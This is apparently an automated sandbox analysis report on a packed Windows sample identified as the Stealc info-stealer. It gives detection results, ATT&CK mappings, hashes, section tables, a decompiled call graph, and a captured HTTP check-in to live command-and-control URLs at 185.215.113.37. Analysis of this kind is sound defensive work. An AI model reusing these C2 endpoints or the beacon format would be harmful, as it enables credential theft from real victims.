Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00697A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, | 0_2_00697A30

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1767079494.000000000146E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1718963736.00000000051A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7260, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1767079494.000000000146E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1718963736.00000000051A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7260, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK matrix, listed per tactic (the number in parentheses is the count shown next to that technique in the report's matrix):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Command and Scripting Interpreter (2); Native API (11); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (33); Disable or Modify Tools (11); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery (2); Security Software Discovery (641); Virtualization/Sandbox Evasion (33); Process Discovery (13); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (324)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: Encrypted Channel (2); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Source | Detection | Scanner | Label
file.exe | 54% | Virustotal |
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37/ws | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.phpL | 17% | Virustotal |
http://185.215.113.37/e2b1563c6670f193.php8 | 17% | Virustotal |
http://185.215.113.37/e2b1563c6670f193.phpx | 17% | Virustotal |
http://185.215.113.37/e2b1563c6670f193.php$ | 17% | Virustotal |
http://185.215.113.37/e2b1563c6670f193.phpP | 17% | Virustotal |
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/e2b1563c6670f193.phpL | file.exe, 00000000.00000002.1767079494.00000000014B4000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37o | file.exe, 00000000.00000002.1767079494.000000000146E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpRx | file.exe, 00000000.00000002.1767079494.00000000014C8000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpP | file.exe, 00000000.00000002.1767079494.00000000014B4000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/ws | file.exe, 00000000.00000002.1767079494.00000000014C8000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/Lxcq | file.exe, 00000000.00000002.1767079494.00000000014C8000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.php8 | file.exe, 00000000.00000002.1767079494.00000000014B4000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpx | file.exe, 00000000.00000002.1767079494.00000000014B4000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/6122658-3693405117-2476756634-1002e | file.exe, 00000000.00000002.1767079494.00000000014B4000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/UxZq | file.exe, 00000000.00000002.1767079494.00000000014C8000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/cx | file.exe, 00000000.00000002.1767079494.00000000014C8000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.1767079494.000000000146E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php$ | file.exe, 00000000.00000002.1767079494.00000000014C8000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1532364
Start date and time: 2024-10-13 02:43:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 12s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 1
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 19
• Number of non-executed functions: 82
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Report size getting too big, too many NtQueryValueKey calls found.
                            No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                            No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                            No context
                            No context
                            No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.948199345776722
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'812'992 bytes
MD5: fb664593a62eba5ceb677e19aedc1673
SHA1: aee5527070492aa7d1e7c93a3a806ba0ef8fab8c
SHA256: 0d7cf91d5f474164b23946086b63538ccb1e4bf612e45e9556b2021574b26731
SHA512: 9daa8fac60192325b864abab66fd336fb9780520cdd6d92e1ed3adaf0709c1c8fa3f244ed32d3f22a88b49196ed10f098df3a68edb547654b5e471b90bf20995
SSDEEP: 49152:+mjNu5fveeWJOxlGWV6E+oW8zNzwRkdWQifYK5i:e3eeWJOG0+oW8zNzWBQ
TLSH: 738533D48C39C2EEDC0548B1F5F6C61B34ADEC610EDAB279A52CC6B5923AF643006B5D
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
Icon Hash: 90cececece8e8eb0
Entrypoint: 0xa8a000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                            Instruction
                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | a5ac66f4a874f117cd276a05d87a70cf | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x296000 | 0x200 | b4e0dc5711a23e4046392eff11b943a9 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
miiyolpi | 0x4f4000 | 0x195000 | 0x194600 | 954e1dd92542375ef8f9ebbcc8a324bd | False | 0.9950571145672333 | data | 7.954024820130496 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
gkepzjad | 0x689000 | 0x1000 | 0x600 | 7906390b8844c1779fb515c3b91e0c6e | False | 0.587890625 | data | 5.027648785311885 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x68a000 | 0x3000 | 0x2200 | 9c9b371789ae93e188356b517404fbbe | False | 0.06330422794117647 | DOS executable (COM) | 0.7797749107477159 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-13T02:44:05.656962+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 13, 2024 02:44:03.714075089 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 13, 2024 02:44:03.719230890 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 13, 2024 02:44:03.719355106 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 13, 2024 02:44:03.719495058 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 13, 2024 02:44:03.724503994 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 13, 2024 02:44:05.426719904 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 13, 2024 02:44:05.426851988 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 13, 2024 02:44:05.430236101 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 13, 2024 02:44:05.435091972 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 13, 2024 02:44:05.656846046 CEST | 80 | 49730 | 185.215.113.37 | 192.168.2.4
Oct 13, 2024 02:44:05.656961918 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
Oct 13, 2024 02:44:08.558729887 CEST | 49730 | 80 | 192.168.2.4 | 185.215.113.37
                            • 185.215.113.37
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | 7260 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 13, 2024 02:44:03.719495058 CEST | 89 | OUT | GET / HTTP/1.1
                            Host: 185.215.113.37
                            Connection: Keep-Alive
                            Cache-Control: no-cache
Oct 13, 2024 02:44:05.426719904 CEST | 203 | IN | HTTP/1.1 200 OK
                            Date: Sun, 13 Oct 2024 00:44:05 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
Oct 13, 2024 02:44:05.430236101 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----DAFIEHIEGDHIDGDGHDHJ
                            Host: 185.215.113.37
                            Content-Length: 211
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Data Raw: 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 46 41 46 34 31 37 35 44 39 42 36 31 37 30 39 33 34 31 30 38 36 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 2d 2d 0d 0a
                            Data Ascii: ------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="hwid"6FAF4175D9B61709341086------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="build"doma------DAFIEHIEGDHIDGDGHDHJ--
Oct 13, 2024 02:44:05.656846046 CEST | 210 | IN | HTTP/1.1 200 OK
                            Date: Sun, 13 Oct 2024 00:44:05 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
                            Data Ascii: YmxvY2s=



                            Target ID:0
                            Start time:20:43:58
                            Start date:12/10/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0x680000
                            File size:1'812'992 bytes
                            MD5 hash:FB664593A62EBA5CEB677E19AEDC1673
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1767079494.000000000146E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1718963736.00000000051A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true


                              Execution Graph

                              Execution Coverage:8.7%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:9.7%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:24
lstrcpy 14530->14531 14532 6815d9 14531->14532 14533 69a7a0 lstrcpy 14532->14533 14534 681663 14533->14534 14535 695510 14534->14535 14536 695521 14535->14536 14537 69a820 2 API calls 14536->14537 14538 69552e 14537->14538 14539 69a820 2 API calls 14538->14539 14540 69553b 14539->14540 14541 69a820 2 API calls 14540->14541 14542 695548 14541->14542 14543 69a740 lstrcpy 14542->14543 14544 695555 14543->14544 14545 69a740 lstrcpy 14544->14545 14546 695562 14545->14546 14547 69a740 lstrcpy 14546->14547 14548 69556f 14547->14548 14549 69a740 lstrcpy 14548->14549 14589 69557c 14549->14589 14550 69a740 lstrcpy 14550->14589 14551 695643 StrCmpCA 14551->14589 14552 6956a0 StrCmpCA 14553 6957dc 14552->14553 14552->14589 14554 69a8a0 lstrcpy 14553->14554 14555 6957e8 14554->14555 14556 69a820 2 API calls 14555->14556 14558 6957f6 14556->14558 14557 69a820 lstrlen lstrcpy 14557->14589 14560 69a820 2 API calls 14558->14560 14559 695856 StrCmpCA 14561 695991 14559->14561 14559->14589 14564 695805 14560->14564 14563 69a8a0 lstrcpy 14561->14563 14562 69a7a0 lstrcpy 14562->14589 14565 69599d 14563->14565 14566 681670 lstrcpy 14564->14566 14568 69a820 2 API calls 14565->14568 14587 695811 14566->14587 14567 681590 lstrcpy 14567->14589 14569 6959ab 14568->14569 14572 69a820 2 API calls 14569->14572 14570 695a0b StrCmpCA 14573 695a28 14570->14573 14574 695a16 Sleep 14570->14574 14571 6952c0 25 API calls 14571->14589 14575 6959ba 14572->14575 14576 69a8a0 lstrcpy 14573->14576 14574->14589 14578 681670 lstrcpy 14575->14578 14579 695a34 14576->14579 14577 69a8a0 lstrcpy 14577->14589 14578->14587 14580 69a820 2 API calls 14579->14580 14582 695a43 14580->14582 14581 6951f0 20 API calls 14581->14589 14583 69a820 2 API calls 14582->14583 14585 695a52 14583->14585 14584 69578a StrCmpCA 14584->14589 14586 681670 lstrcpy 14585->14586 14586->14587 14587->13642 14588 69593f StrCmpCA 14588->14589 14589->14550 14589->14551 14589->14552 14589->14557 14589->14559 14589->14562 14589->14567 
14589->14570 14589->14571 14589->14577 14589->14581 14589->14584 14589->14588 14591 69754c 14590->14591 14592 697553 GetVolumeInformationA 14590->14592 14591->14592 14593 697591 14592->14593 14594 6975fc GetProcessHeap RtlAllocateHeap 14593->14594 14595 697619 14594->14595 14596 697628 wsprintfA 14594->14596 14597 69a740 lstrcpy 14595->14597 14598 69a740 lstrcpy 14596->14598 14599 695da7 14597->14599 14598->14599 14599->13663 14601 69a7a0 lstrcpy 14600->14601 14602 684899 14601->14602 15654 6847b0 14602->15654 14604 6848a5 14605 69a740 lstrcpy 14604->14605 14606 6848d7 14605->14606 14607 69a740 lstrcpy 14606->14607 14608 6848e4 14607->14608 14609 69a740 lstrcpy 14608->14609 14610 6848f1 14609->14610 14611 69a740 lstrcpy 14610->14611 14612 6848fe 14611->14612 14613 69a740 lstrcpy 14612->14613 14614 68490b InternetOpenA StrCmpCA 14613->14614 14615 684944 14614->14615 14616 684ecb InternetCloseHandle 14615->14616 15660 698b60 14615->15660 14618 684ee8 14616->14618 15675 689ac0 CryptStringToBinaryA 14618->15675 14619 684963 15668 69a920 14619->15668 14623 684976 14624 69a8a0 lstrcpy 14623->14624 14629 68497f 14624->14629 14625 69a820 2 API calls 14626 684f05 14625->14626 14627 69a9b0 4 API calls 14626->14627 14630 684f1b 14627->14630 14628 684f27 ctype 14632 69a7a0 lstrcpy 14628->14632 14633 69a9b0 4 API calls 14629->14633 14631 69a8a0 lstrcpy 14630->14631 14631->14628 14645 684f57 14632->14645 14634 6849a9 14633->14634 14635 69a8a0 lstrcpy 14634->14635 14636 6849b2 14635->14636 14637 69a9b0 4 API calls 14636->14637 14638 6849d1 14637->14638 14639 69a8a0 lstrcpy 14638->14639 14640 6849da 14639->14640 14641 69a920 3 API calls 14640->14641 14642 6849f8 14641->14642 14643 69a8a0 lstrcpy 14642->14643 14644 684a01 14643->14644 14646 69a9b0 4 API calls 14644->14646 14645->13666 14647 684a20 14646->14647 14648 69a8a0 lstrcpy 14647->14648 14649 684a29 14648->14649 14650 69a9b0 4 API calls 14649->14650 14651 684a48 14650->14651 14652 69a8a0 lstrcpy 14651->14652 14653 684a51 
14652->14653 14654 69a9b0 4 API calls 14653->14654 14655 684a7d 14654->14655 14656 69a920 3 API calls 14655->14656 14657 684a84 14656->14657 14658 69a8a0 lstrcpy 14657->14658 14659 684a8d 14658->14659 14660 684aa3 InternetConnectA 14659->14660 14660->14616 14661 684ad3 HttpOpenRequestA 14660->14661 14663 684b28 14661->14663 14664 684ebe InternetCloseHandle 14661->14664 14665 69a9b0 4 API calls 14663->14665 14664->14616 14666 684b3c 14665->14666 14667 69a8a0 lstrcpy 14666->14667 14668 684b45 14667->14668 14669 69a920 3 API calls 14668->14669 14670 684b63 14669->14670 14671 69a8a0 lstrcpy 14670->14671 14672 684b6c 14671->14672 14673 69a9b0 4 API calls 14672->14673 14674 684b8b 14673->14674 14675 69a8a0 lstrcpy 14674->14675 14676 684b94 14675->14676 14677 69a9b0 4 API calls 14676->14677 14678 684bb5 14677->14678 14679 69a8a0 lstrcpy 14678->14679 14680 684bbe 14679->14680 14681 69a9b0 4 API calls 14680->14681 14682 684bde 14681->14682 14683 69a8a0 lstrcpy 14682->14683 14684 684be7 14683->14684 14685 69a9b0 4 API calls 14684->14685 14686 684c06 14685->14686 14687 69a8a0 lstrcpy 14686->14687 14688 684c0f 14687->14688 14689 69a920 3 API calls 14688->14689 14690 684c2d 14689->14690 14691 69a8a0 lstrcpy 14690->14691 14692 684c36 14691->14692 14693 69a9b0 4 API calls 14692->14693 14694 684c55 14693->14694 14695 69a8a0 lstrcpy 14694->14695 14696 684c5e 14695->14696 14697 69a9b0 4 API calls 14696->14697 14698 684c7d 14697->14698 14699 69a8a0 lstrcpy 14698->14699 14700 684c86 14699->14700 14701 69a920 3 API calls 14700->14701 14702 684ca4 14701->14702 14703 69a8a0 lstrcpy 14702->14703 14704 684cad 14703->14704 14705 69a9b0 4 API calls 14704->14705 14706 684ccc 14705->14706 14707 69a8a0 lstrcpy 14706->14707 14708 684cd5 14707->14708 14709 69a9b0 4 API calls 14708->14709 14710 684cf6 14709->14710 14711 69a8a0 lstrcpy 14710->14711 14712 684cff 14711->14712 14713 69a9b0 4 API calls 14712->14713 14714 684d1f 14713->14714 14715 69a8a0 lstrcpy 14714->14715 14716 684d28 14715->14716 
14717 69a9b0 4 API calls 14716->14717 14718 684d47 14717->14718 14719 69a8a0 lstrcpy 14718->14719 14720 684d50 14719->14720 14721 69a920 3 API calls 14720->14721 14722 684d6e 14721->14722 14723 69a8a0 lstrcpy 14722->14723 14724 684d77 14723->14724 14725 69a740 lstrcpy 14724->14725 14726 684d92 14725->14726 14727 69a920 3 API calls 14726->14727 14728 684db3 14727->14728 14729 69a920 3 API calls 14728->14729 14730 684dba 14729->14730 14731 69a8a0 lstrcpy 14730->14731 14732 684dc6 14731->14732 14733 684de7 lstrlen 14732->14733 14734 684dfa 14733->14734 14735 684e03 lstrlen 14734->14735 15674 69aad0 14735->15674 14737 684e13 HttpSendRequestA 14738 684e32 InternetReadFile 14737->14738 14739 684e67 InternetCloseHandle 14738->14739 14744 684e5e 14738->14744 14742 69a800 14739->14742 14741 69a9b0 4 API calls 14741->14744 14742->14664 14743 69a8a0 lstrcpy 14743->14744 14744->14738 14744->14739 14744->14741 14744->14743 15681 69aad0 14745->15681 14747 6917c4 StrCmpCA 14748 6917cf ExitProcess 14747->14748 14749 6917d7 14747->14749 14750 6919c2 14749->14750 14751 6918ad StrCmpCA 14749->14751 14752 6918cf StrCmpCA 14749->14752 14753 69185d StrCmpCA 14749->14753 14754 69187f StrCmpCA 14749->14754 14755 6918f1 StrCmpCA 14749->14755 14756 691951 StrCmpCA 14749->14756 14757 691970 StrCmpCA 14749->14757 14758 691913 StrCmpCA 14749->14758 14759 691932 StrCmpCA 14749->14759 14760 69a820 lstrlen lstrcpy 14749->14760 14750->13668 14751->14749 14752->14749 14753->14749 14754->14749 14755->14749 14756->14749 14757->14749 14758->14749 14759->14749 14760->14749 14762 69a7a0 lstrcpy 14761->14762 14763 685979 14762->14763 14764 6847b0 2 API calls 14763->14764 14765 685985 14764->14765 14766 69a740 lstrcpy 14765->14766 14767 6859ba 14766->14767 14768 69a740 lstrcpy 14767->14768 14769 6859c7 14768->14769 14770 69a740 lstrcpy 14769->14770 14771 6859d4 14770->14771 14772 69a740 lstrcpy 14771->14772 14773 6859e1 14772->14773 14774 69a740 lstrcpy 14773->14774 14775 6859ee InternetOpenA StrCmpCA 
